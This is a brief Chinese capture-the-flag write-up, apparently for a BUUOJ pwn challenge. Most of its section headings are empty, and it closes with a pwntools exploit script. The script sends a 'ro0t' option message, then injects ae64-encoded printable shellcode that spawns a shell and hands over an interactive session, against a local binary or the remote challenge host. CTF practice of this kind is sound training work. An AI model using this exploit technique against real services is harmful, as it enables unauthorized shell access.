题目
题目链接
checksec
IDA
main
vuln
root
shellcode
有 shellcode 执行
攻击思路
读懂代码后发现难点主要在构造 printable shellcode 上
今天状态不好,没有深入研究,用的 ae64 ,之后会自己试着搓一个看看
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| from pwn import *
from ae64 import AE64
context.log_level = 'debug'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']
debug = 1
if debug:
io = process('./service')
else:
io = remote('node5.buuoj.cn', 26980)
def attack():
payload = b'opt:1\nmsg:ro0t \n\n'
io.sendafter(b'>>> ', payload)
sc = AE64().encode(asm(shellcraft.sh()), 'rdx')
payload = b'opt:2\nmsg:' + sc + b' \n\n'
io.sendafter(b'>>> ', payload)
io.interactive()
attack()
|
